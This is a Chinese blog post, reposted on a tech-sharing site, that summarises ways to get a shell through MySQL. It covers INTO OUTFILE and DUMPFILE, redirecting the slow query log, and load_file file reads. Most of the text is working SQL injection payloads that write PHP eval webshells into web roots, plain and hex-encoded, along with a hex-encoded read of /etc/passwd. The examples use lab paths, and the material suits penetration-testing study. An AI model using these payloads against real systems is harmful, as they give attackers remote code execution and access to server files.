标签：总结 shell into outfile file mysql 日志 select

1.导出函数写shell

触发条件

• 网站绝对路径
• secure_file_priv 的值非NULL或包含了导出的绝对路径
• mysql服务有对网站可访问路径的写权限
• .mysql连接用户有FILE权限/ROOT用户或ROOT权限

可以使用如下语句

show global variables like '%secure%';
#查询secure_file_priv的值，
secure_file_priv的值在mysql配置文件my.ini中设置，这个参数用来限制数据导入导出
Mysql>=5.5.53 默认为NULL，即默认禁止导入导出
Mysql<5.5.53 默认为空，即默认无限制

secure_file_priv值为NULL = 禁止导入导出

使用函数

outfile 和 dumpfile

• outfile

  #实例
  select '<?php phpinfo(); ?>' into outfile "C:\\\\phpStudy\\MySQL\\bin\\1.php"; select * from student into outfile 'C:/phpStudy/MySQL/bin/test.php';
  

• dumpfile

  #实例
  select '<?php phpinfo(); ?>' into dumpfile "C:\\phpStudy\\MySQL\\bin\\1.php"; select * from student into outfile 'C:/phpStudy/MySQL/bin/test.php';
  

注意：

两者路径都不可用hex进制来表示
两个函数导出的格式有不同：outfile多行，dumpfile只能导出单行。写shell是注意格式

实践

1.一句话 outfile 直接写

#直接写
-1' union select 1,"<?php @eval($_POST['c']);?>" into outfile "C:/phpStudy/WWW/shell.php"#
#shell HEX编码
id=-1' union select 1,0x3C3F70687020406576616C28245F504F53545B2763275D293B3F3E into outfile "C:/phpStudy/WWW/shell.php"#

2.一句话 插入数据库再outfile

#写入数据
id=-1';insert into dvwa.guestbook values (2,"<?php @eval($_POST['c']);?>","shell") ;#
#读到shell.php
id=-1' union select comment,name from dvwa.guestbook into outfile 'C:/phpStudy/WWW/shell.php';#

select …… into outfile

使用命令 select 'a\naa\raaaa' into outfile '/tmp/test.txt' 来看一下在常用的写文件场景下的结果

可以看到outfile对导出内容中的\n等特殊字符进行了转义，并且在文件内容的末尾增加了一个新行

接着使用命令 select 'a\naa\raaaa' into dumpfile '/tmp/test.txt' 来看一下

可以看到dumpfile对文件内容是原意写入，未做任何转移和增加。这也就是为什么 在平常的UDF提权中使用dumpfile进行dll文件 写入的原因

2.用日志写shell

触发条件

• 网站可访问路径的绝对路径
• mysql服务有对网站可访问路径的写权限
• mysql连接用户有权限开启日志记录和更换日志路径/ROOT权限

mysql日志详解：https://blog.csdn.net/maguang_it/article/details/79922339

只有查询日志和慢查询日志可利用，演示用的是慢查询日志，

慢查询日志
慢查询日志是用来记录执行时间超过指定时间的查询语句。

#查询慢查询是否开启
SHOW GLOBAL VARIABLES LIKE '%query_log%';
#开启慢查询
set global slow_query_log = 1;
#更改日志路径，这里的日志路径可以hex编码
set global slow_query_log_file='C:/phpStudy/WWW/logshell.php';

OFF 表示关闭，log_file表示日志存放目录

完成时间大于10s的sql语句会被记录进慢查询日志，如：select * from users where sleep(11);

实践

1.开启慢查询日志并修改日志为网站路径下的脚本

-1';set global slow_query_log = 1;set global slow_query_log_file='C:/phpStudy/WWW/logshell.php';#

2.执行包含Shell的查询语句并使用sleep(11)让语句记录进慢查询日志脚本

-1';select "<?php eval($_POST[log]);?>" from users where sleep(11);#

3.load_file读文件

触发条件

• 所读文件的绝对路径
• secure_file_priv 的值非NULL或包含了所读文件的绝对路径
• mysql服务有对所读文件的读权限
• mysql连接用户有FILE权限/ROOT用户或ROOT权限

使用函数load_file()

select load_file('绝对路径');

与outfile/dumpfile不同的是，load_file的路径可被hex编码

select load_file(0x2F6574632F706173737764);

参考

https://www.cnblogs.com/zztac/p/11371149.html

https://www.freebuf.com/articles/web/244103.html

标签：总结,shell,into,outfile,file,mysql,日志,select
来源： https://www.cnblogs.com/OutBxx/p/15865805.html

本站声明： 1. iCode9 技术分享网（下文简称本站）提供的所有内容，仅供技术学习、探讨和分享；
2. 关于本站的所有留言、评论、转载及引用，纯属内容发起人的个人观点，与本站观点和立场无关；
3. 关于本站的所有言论和文字，纯属内容发起人的个人观点，与本站观点和立场无关；
4. 本站文章均是网友提供，不完全保证技术分享内容的完整性、准确性、时效性、风险性和版权归属；如您发现该文章侵犯了您的权益，可联系我们第一时间进行删除；
5. 本站为非盈利性的个人网站，所有内容不会用来进行牟利，也不会利用任何形式的广告来间接获益，纯粹是为了广大技术爱好者提供技术内容和技术思想的分享性交流网站。